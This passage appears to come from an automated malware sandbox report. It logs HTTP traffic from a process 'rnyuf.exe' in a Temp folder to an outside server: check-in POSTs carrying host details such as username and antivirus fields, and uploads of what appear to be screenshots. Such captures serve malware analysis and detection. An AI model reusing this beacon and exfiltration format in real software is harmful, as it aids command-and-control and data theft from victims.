                                        Aug 29, 2021 22:28:53.365158081 CEST16091OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:28:53.400152922 CEST16093OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:28:53.400245905 CEST16096OUTData Raw: 53 15 1b 68 d6 d2 72 8f 8a af ac 47 a9 5c ac e6 68 ad e9 3c 3c df c0 ea 6a ac 9a 25 ca 74 5c 8f 6a b5 5a 0f a8 9a 6b 74 65 d2 d5 97 b0 b8 8f ac 6c 3f 0a 81 a2 71 d5 4d 5a 92 62 19 9a 5a 31 8a 00 aa 10 52 e6 92 81 40 0e 06 9d 9a 65 38 75 a6 48 f0
                                        Data Ascii: ShrG\h<<j%t\jZktel?qMZbZ1R@e8uHjqGTY&1{3IN4,}RZJZJ)h@J(4Q@hQ(Q@Q@SiGZ-QM(R)@8pN"1NWbHJm<MK)#)i8R1E^)hh
                                        Aug 29, 2021 22:28:53.400799990 CEST16110OUTData Raw: 54 8e cc dc 87 52 90 74 94 fe 75 a3 06 ab 70 3f e5 a9 35 ca 23 94 61 5a 76 ce 49 ae 5a b8 78 5b 63 d1 c3 63 6a 37 6b 9d 47 88 27 79 bc 15 23 b7 52 6b c7 e5 3f 31 af 56 d7 1f 1e 03 6f f7 ab c9 64 ea 69 65 8a d4 e5 ea 77 e3 f5 ab 16 fb 23 da 74 67
                                        Data Ascii: TRtup?5#aZvIZx[ccj7kG'y#Rk?1Vodiew#tg<J):\P3EgyWNO;Qdoi_qT=iv_FL.PR_^Ei%CVUR[.},s2hwalT-a:pcqWdTSin$<
                                        Aug 29, 2021 22:28:53.511938095 CEST16160INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:53 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        256192.168.2.44999546.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:53.582918882 CEST16161OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:53.659307003 CEST16161INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:53 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        257192.168.2.44999646.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:53.874197960 CEST16162OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:53.950877905 CEST16252INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:53 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        258192.168.2.44999746.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:53.878019094 CEST16163OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----22b9bce780ae51346657ff6c50487d5a
                                        Host: 46.17.96.36
                                        Content-Length: 107598
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:28:53.878096104 CEST16163OUTData Raw: 2d 2d 2d 2d 2d 2d 32 32 62 39 62 63 65 37 38 30 61 65 35 31 33 34 36 36 35 37 66 66 36 63 35 30 34 38 37 64 35 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------22b9bce780ae51346657ff6c50487d5aContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:28:53.878537893 CEST16173OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:28:53.878770113 CEST16176OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:28:53.913691044 CEST16178OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:28:53.913733006 CEST16181OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:28:53.913741112 CEST16184OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:28:53.914014101 CEST16192OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:28:53.914114952 CEST16196OUTData Raw: b3 13 c9 24 f7 34 66 bb 23 b2 4c e4 95 9b 6d 0e f2 d4 f7 a4 31 0f 5a 4e 69 72 6a b4 27 51 3c 9f 7a 3c 93 4b b8 d2 ef 34 59 0e f2 19 e5 35 21 42 2a 5f 33 da 9d e6 0f 4a 2c 85 76 56 c1 f4 a5 c7 b5 58 dc a7 b5 38 04 3d a8 e4 0e 72 a5 15 68 c6 9d 8d
                                        Data Ascii: $4f#Lm1ZNirj'Q<z<K4Y5!B*_3J,vVX8=rh'Mjoy+dCKRy,)l;Qf;SNYQE%(QKLAEPEJ(,!(bbQE)iZ){!i`Z))EIAKE-)j,(SR>Sii:@PE-B
                                        Aug 29, 2021 22:28:53.914284945 CEST16201OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:28:53.949532986 CEST16204OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:28:54.060151100 CEST16272INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:54 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        259192.168.2.44999846.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:54.192004919 CEST16273OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:54.276460886 CEST16273INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:54 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0
                                        Aug 29, 2021 22:28:54.394821882 CEST16273OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3c
                                        Host: 46.17.96.36
                                        Content-Length: 107128
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:28:54.394903898 CEST16273OUTData Raw: 2d 2d 2d 2d 2d 2d 34 31 32 65 38 35 62 30 37 65 62 63 39 33 31 63 39 33 30 35 64 36 64 37 61 35 64 39 36 64 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------412e85b07ebc931c9305d6d7a5d96d3cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:28:54.395075083 CEST16283OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:28:54.395260096 CEST16286OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:28:54.430876970 CEST16292OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:28:54.430951118 CEST16308OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:28:54.430991888 CEST16313OUTData Raw: b5 1a 90 b5 c9 78 47 14 e5 4e a2 76 3e 52 ef 5e 95 f0 3d 51 fc 79 2a ba ab 29 b1 93 21 86 47 de 4a f3 5a eb 3e 1e 78 a6 d3 c1 fe 24 7d 4e f2 de 69 e2 36 ef 10 48 b1 92 49 5f 52 38 e0 d7 9d 51 37 06 91 ed 53 69 49 36 7a 94 7e 28 bd be f1 84 70 d8
                                        Data Ascii: xGNv>R^=Qy*)!GJZ>x$}Ni6HI_R8Q7SiI6z~(pI-{d\#8$/exjQUUf 8fg4Rfy^8#TZ#Qu]oIV}+mmkEx[II uH {
                                        Aug 29, 2021 22:28:54.468225002 CEST16316OUTData Raw: 90 14 6d a2 48 8b 15 03 e6 fb a4 b1 c8 ce 7d c5 72 5a aa b7 e3 f7 af d2 e7 53 74 da 7f 81 62 1f 09 c9 3b ed 1a c6 94 aa f7 26 ce dd dd e5 0b 73 30 00 b2 21 f2 f8 c1 65 05 9b 6a e4 f0 48 e6 8b 3f 05 dd dd 5b da c9 f6 ed 36 09 ee a3 9a 58 6d a6 99
                                        Data Ascii: mH}rZStb;&s0!ejH?[6Xm3,$dtznDmaaw5\#m3c,XTq1J,$+X\[#8b]f7cu?VMK_j0X\[^A5KtP?0O~6\vOn[28
                                        Aug 29, 2021 22:28:54.468282938 CEST16337OUTData Raw: b8 d2 ef de 58 82 ee 31 be 57 e6 50 dc 65 c1 e8 47 6a e5 a7 56 a5 57 cb 08 dd 9b d4 a7 4e 92 e6 9c ac 8f 9f bf b1 f5 3f fa 07 5d ff 00 df 86 ff 00 0a 3f b1 f5 3f fa 07 5d ff 00 df 86 ff 00 0a f7 33 e2 1f 03 8e ba 4e a7 f9 8f fe 39 5b fa 35 9f 85
                                        Data Ascii: X1WPeGjVWN?]??]3N9[5u5&0`G^y")%6cZXeVh9:GktFdmvs0~^H xY3.Y]Z*9WAQE(>o&Q\bdg)z{WU
                                        Aug 29, 2021 22:28:54.468331099 CEST16339OUTData Raw: ff 00 84 6b 5f 92 c1 65 69 23 da 24 8d 9d 0a 36 d3 9c 64 10 0e 78 ad a9 56 e7 d1 ee 63 56 97 26 ab 63 0c 75 a7 f6 a6 53 bb 57 42 30 61 de 9e 29 29 d5 44 b2 c5 95 a4 fa 85 f5 bd 95 ac 7e 65 c5 c4 ab 14 49 90 37 3b 10 00 c9 e0 72 7b d7 61 ff 00 0a
                                        Data Ascii: k_ei#$6dxVcV&cuSWB0a))D~eI7;r{a??gZT~C+iSH6Q7Tuo~,P;uG&8$#$BN'T7CLK;o9LH~.fUM?
                                        Aug 29, 2021 22:28:54.468358040 CEST16355OUTData Raw: e5 fa ca d5 17 9f 23 7d e7 63 f8 d4 20 d2 83 cd 35 4e 2b a0 bd ac 9f 52 46 63 b4 fd 2b ca 7c 7f ff 00 21 5b 6f fa e0 3f 99 af 55 3c ab 7d 2b ca 7c 7b ce ab 6d ff 00 5e e3 f9 9a d6 92 44 36 dc 91 e5 c7 a5 25 14 57 9e 7b 68 f4 df 81 9f f2 3b 5e ff
                                        Data Ascii: #}c 5N+RFc+|![o?U<}+|{m^D6%W{h;^9duD\<oh(H'MK=cZG{LcrUVu=,-hBC[k`:j-N08V"Gh?j?qG;4SsK@
                                        Aug 29, 2021 22:28:54.578267097 CEST16381INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:54 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        26192.168.2.44976146.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:22.130506992 CEST3825OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688c
                                        Host: 46.17.96.36
                                        Content-Length: 107127
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:22.130615950 CEST3825OUTData Raw: 2d 2d 2d 2d 2d 2d 36 66 32 62 38 65 63 31 32 35 38 33 33 62 66 66 65 36 31 63 33 30 38 62 30 34 30 31 36 38 38 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------6f2b8ec125833bffe61c308b0401688cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:22.130789995 CEST3835OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:22.130882978 CEST3838OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:22.166085958 CEST3841OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:22.166146994 CEST3858OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:27:22.166172028 CEST3863OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:27:22.201596975 CEST3868OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:22.201636076 CEST3882OUTData Raw: 54 8e cc dc 87 52 90 74 94 fe 75 a3 06 ab 70 3f e5 a9 35 ca 23 94 61 5a 76 ce 49 ae 5a b8 78 5b 63 d1 c3 63 6a 37 6b 9d 47 88 27 79 bc 15 23 b7 52 6b c7 e5 3f 31 af 56 d7 1f 1e 03 6f f7 ab c9 64 ea 69 65 8a d4 e5 ea 77 e3 f5 ab 16 fb 23 da 74 67
                                        Data Ascii: TRtup?5#aZvIZx[ccj7kG'y#Rk?1Vodiew#tg<J):\P3EgyWNO;Qdoi_qT=iv_FL.PR_^Ei%CVUR[.},s2hwalT-a:pcqWdTSin$<
                                        Aug 29, 2021 22:27:22.201654911 CEST3887OUTData Raw: 50 67 ce f8 cd 30 83 9e 6b e8 e5 f0 d6 88 07 fc 82 ed 7f ef 8a f3 3f 89 9a 7d 9d 95 cd 97 d9 2d a2 83 72 36 e1 18 c6 79 aa 85 5e 77 60 92 e5 3c 8e 93 14 99 a5 15 c6 7a 07 a6 fc 0d e3 c6 b7 bf f6 0e 7f fd 19 1d 7b ad f3 e2 df 1f de 60 3f af f4 af
                                        Data Ascii: Pg0k?}-r6y^w`<z{`?t}fA4;;;]> x!GVP)F{0T]Il;j|~)k%o1)qIJ+,)i3@4uR)<:s^Q_YH;x~^S
                                        Aug 29, 2021 22:27:22.201669931 CEST3892OUTData Raw: de af 27 b1 1f f1 3a b4 ff 00 ae cb fc e8 cb 9f fb 1b f9 9d 78 fd 31 bf 71 ea 3e 2b ff 00 90 84 7f f5 cc 57 3a c3 9e 2b a3 f1 59 c6 a1 1f fd 73 ae 70 9e 6a 30 7f c1 46 38 ff 00 e3 c8 6e 29 7a 51 45 75 9c 03 b3 4e 18 a6 01 4e 02 a5 96 87 8a 5c d3
                                        Data Ascii: ':x1q>+W:+Yspj0F8n)zQEuNN\E-"fi*Yhpf)f"ARbr*EJ)TSSrKIZ)F2ep`T3D; se\B^_yMEMJ=+EP)hZb"@iiE
                                        Aug 29, 2021 22:27:22.312053919 CEST3932INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:22 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        260192.168.2.44999946.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
